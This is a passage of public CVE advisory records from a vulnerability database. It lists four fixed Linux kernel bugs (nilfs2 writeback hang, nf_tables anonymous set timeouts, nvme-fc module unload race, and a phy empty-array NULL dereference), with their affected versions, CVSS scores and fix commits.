"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix hang in nilfs_lookup_dirty_data_buffers()\n\nSyzbot reported a hang issue in migrate_pages_batch() called by mbind()\nand nilfs_lookup_dirty_data_buffers() called in the log writer of nilfs2.\n\nWhile migrate_pages_batch() locks a folio and waits for the writeback to\ncomplete, the log writer thread that should bring the writeback to\ncompletion picks up the folio being written back in\nnilfs_lookup_dirty_data_buffers() that it calls for subsequent log\ncreation and was trying to lock the folio. Thus causing a deadlock.\n\nIn the first place, it is unexpected that folios/pages in the middle of\nwriteback will be updated and become dirty. Nilfs2 adds a checksum to\nverify the validity of the log being written and uses it for recovery at\nmount, so data changes during writeback are suppressed. Since this is\nbroken, an unclean shutdown could potentially cause recovery to fail.\n\nInvestigation revealed that the root cause is that the wait for writeback\ncompletion in nilfs_page_mkwrite() is conditional, and if the backing\ndevice does not require stable writes, data may be modified without\nwaiting.\n\nFix these issues by making nilfs_page_mkwrite() wait for writeback to\nfinish regardless of the stable write requirement of the backing device."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:16.666Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/228742b2ddfb99dfd71e5a307e6088ab6836272e"
},
{
"url": "https://git.kernel.org/stable/c/862ee4422c38be5c249844a684b00d0dbe9d1e46"
},
{
"url": "https://git.kernel.org/stable/c/98a4026b22ff440c7f47056481bcbbe442f607d6"
},
{
"url": "https://git.kernel.org/stable/c/7e9b622bd0748cc104d66535b76d9b3535f9dc0f"
},
{
"url": "https://git.kernel.org/stable/c/8494ba2c9ea00a54d5b50e69b22c55a8958bce32"
},
{
"url": "https://git.kernel.org/stable/c/ea5ddbc11613b55e5128c85f57b08f907abd9b28"
},
{
"url": "https://git.kernel.org/stable/c/e38585401d464578d30f5868ff4ca54475c34f7d"
},
{
"url": "https://git.kernel.org/stable/c/38296afe3c6ee07319e01bb249aa4bb47c07b534"
}
],
"title": "nilfs2: fix hang in nilfs_lookup_dirty_data_buffers()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26696",
"datePublished": "2024-04-03T14:54:56.926Z",
"dateReserved": "2024-02-19T14:20:24.156Z",
"dateUpdated": "2025-05-04T08:54:16.666Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52620 (GCVE-0-2023-52620)
Vulnerability from cvelistv5
Published
2024-03-21 10:43
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: disallow timeout for anonymous sets
Never used from userspace, disallow these parameters.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 2.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52620",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T20:33:31.634112Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T20:01:21.818Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.362Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/116b0e8e4673a5faa8a739a19b467010c4d3058c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49ce99ae43314d887153e07cec8bb6a647a19268"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f3ae02bbb62f151b19162d5fdc9fe3d48450323"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00b19ee0dcc1aef06294471ab489bae26d94524e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7be6c737a179a76901c872f6b4c1d00552d9a1b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e26d3009efda338f19016df4175f354a9bd0a4ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "116b0e8e4673a5faa8a739a19b467010c4d3058c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "49ce99ae43314d887153e07cec8bb6a647a19268",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6f3ae02bbb62f151b19162d5fdc9fe3d48450323",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "00b19ee0dcc1aef06294471ab489bae26d94524e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b7be6c737a179a76901c872f6b4c1d00552d9a1b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e26d3009efda338f19016df4175f354a9bd0a4ab",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: disallow timeout for anonymous sets\n\nNever used from userspace, disallow these parameters."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:07.274Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/116b0e8e4673a5faa8a739a19b467010c4d3058c"
},
{
"url": "https://git.kernel.org/stable/c/49ce99ae43314d887153e07cec8bb6a647a19268"
},
{
"url": "https://git.kernel.org/stable/c/6f3ae02bbb62f151b19162d5fdc9fe3d48450323"
},
{
"url": "https://git.kernel.org/stable/c/00b19ee0dcc1aef06294471ab489bae26d94524e"
},
{
"url": "https://git.kernel.org/stable/c/b7be6c737a179a76901c872f6b4c1d00552d9a1b"
},
{
"url": "https://git.kernel.org/stable/c/e26d3009efda338f19016df4175f354a9bd0a4ab"
}
],
"title": "netfilter: nf_tables: disallow timeout for anonymous sets",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52620",
"datePublished": "2024-03-21T10:43:42.854Z",
"dateReserved": "2024-03-06T09:52:12.090Z",
"dateUpdated": "2025-05-04T07:40:07.274Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26846 (GCVE-0-2024-26846)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvme-fc: do not wait in vain when unloading module
The module exit path has race between deleting all controllers and
freeing 'left over IDs'. To prevent double free a synchronization
between nvme_delete_ctrl and ida_destroy has been added by the initial
commit.
There is some logic around trying to prevent from hanging forever in
wait_for_completion, though it does not handling all cases. E.g.
blktests is able to reproduce the situation where the module unload
hangs forever.
If we completely rely on the cleanup code executed from the
nvme_delete_ctrl path, all IDs will be freed eventually. This makes
calling ida_destroy unnecessary. We only have to ensure that all
nvme_delete_ctrl code has been executed before we leave
nvme_fc_exit_module. This is done by flushing the nvme_delete_wq
workqueue.
While at it, remove the unused nvme_fc_wq workqueue too.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.666Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f2c95015ec2a1899161be6c0bdaecedd5a7bfb2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0bf567d6d9ffe09e059bbdfb4d07143cef42c75c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/085195aa90a924c79e35569bcdad860d764a8e17"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/baa6b7eb8c66486bd64608adc63fe03b30d3c0b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0882c366418bf9c19e1ba7f270fe377a9bf5d67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70fbfc47a392b98e5f8dba70c6efc6839205c982"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26846",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-19T20:32:39.392326Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-415",
"description": "CWE-415 Double Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-11T21:49:19.408Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/fc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4f2c95015ec2a1899161be6c0bdaecedd5a7bfb2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0bf567d6d9ffe09e059bbdfb4d07143cef42c75c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "085195aa90a924c79e35569bcdad860d764a8e17",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "baa6b7eb8c66486bd64608adc63fe03b30d3c0b9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c0882c366418bf9c19e1ba7f270fe377a9bf5d67",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "70fbfc47a392b98e5f8dba70c6efc6839205c982",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/fc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-fc: do not wait in vain when unloading module\n\nThe module exit path has race between deleting all controllers and\nfreeing \u0027left over IDs\u0027. To prevent double free a synchronization\nbetween nvme_delete_ctrl and ida_destroy has been added by the initial\ncommit.\n\nThere is some logic around trying to prevent from hanging forever in\nwait_for_completion, though it does not handling all cases. E.g.\nblktests is able to reproduce the situation where the module unload\nhangs forever.\n\nIf we completely rely on the cleanup code executed from the\nnvme_delete_ctrl path, all IDs will be freed eventually. This makes\ncalling ida_destroy unnecessary. We only have to ensure that all\nnvme_delete_ctrl code has been executed before we leave\nnvme_fc_exit_module. This is done by flushing the nvme_delete_wq\nworkqueue.\n\nWhile at it, remove the unused nvme_fc_wq workqueue too."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:51.558Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4f2c95015ec2a1899161be6c0bdaecedd5a7bfb2"
},
{
"url": "https://git.kernel.org/stable/c/0bf567d6d9ffe09e059bbdfb4d07143cef42c75c"
},
{
"url": "https://git.kernel.org/stable/c/085195aa90a924c79e35569bcdad860d764a8e17"
},
{
"url": "https://git.kernel.org/stable/c/baa6b7eb8c66486bd64608adc63fe03b30d3c0b9"
},
{
"url": "https://git.kernel.org/stable/c/c0882c366418bf9c19e1ba7f270fe377a9bf5d67"
},
{
"url": "https://git.kernel.org/stable/c/70fbfc47a392b98e5f8dba70c6efc6839205c982"
}
],
"title": "nvme-fc: do not wait in vain when unloading module",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26846",
"datePublished": "2024-04-17T10:10:09.964Z",
"dateReserved": "2024-02-19T14:20:24.182Z",
"dateUpdated": "2025-05-04T08:57:51.558Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27047 (GCVE-0-2024-27047)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: phy: fix phy_get_internal_delay accessing an empty array
The phy_get_internal_delay function could try to access to an empty
array in the case that the driver is calling phy_get_internal_delay
without defining delay_values and rx-internal-delay-ps or
tx-internal-delay-ps is defined to 0 in the device-tree.
This will lead to "unable to handle kernel NULL pointer dereference at
virtual address 0". To avoid this kernel oops, the test should be delay
>= 0. As there is already delay < 0 test just before, the test could
only be size == 0.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 Version: 92252eec913b2dd5e7b5de11ea3efa2e64d65cf4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27047",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-09T18:38:46.768621Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:42.449Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.863Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06dd21045a7e8bc8701b0ebedcd9a30a6325878b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e939a002c8a7d66e60bd0ea6b281fb39d713c1a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a2ff709511617de9c6c072eeee82bcbbdfecaf8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/589ec16174dd9378953b8232ae76fad0a96e1563"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0691de7df1d51482a52cac93b7fe82fd9dd296b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0307cf443308ecc6be9b2ca312bb31bae5e5a7ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4469c0c5b14a0919f5965c7ceac96b523eb57b79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/phy/phy_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "06dd21045a7e8bc8701b0ebedcd9a30a6325878b",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
},
{
"lessThan": "0e939a002c8a7d66e60bd0ea6b281fb39d713c1a",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
},
{
"lessThan": "2a2ff709511617de9c6c072eeee82bcbbdfecaf8",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
},
{
"lessThan": "589ec16174dd9378953b8232ae76fad0a96e1563",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
},
{
"lessThan": "c0691de7df1d51482a52cac93b7fe82fd9dd296b",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
},
{
"lessThan": "0307cf443308ecc6be9b2ca312bb31bae5e5a7ad",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
},
{
"lessThan": "4469c0c5b14a0919f5965c7ceac96b523eb57b79",
"status": "affected",
"version": "92252eec913b2dd5e7b5de11ea3efa2e64d65cf4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/phy/phy_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: fix phy_get_internal_delay accessing an empty array\n\nThe phy_get_internal_delay function could try to access to an empty\narray in the case that the driver is calling phy_get_internal_delay\nwithout defining delay_values and rx-internal-delay-ps or\ntx-internal-delay-ps is defined to 0 in the device-tree.\nThis will lead to \"unable to handle kernel NULL pointer dereference at\nvirtual address 0\". To avoid this kernel oops, the test should be delay\n\u003e= 0. As there is already delay \u003c 0 test just before, the test could\nonly be size == 0."
}
],
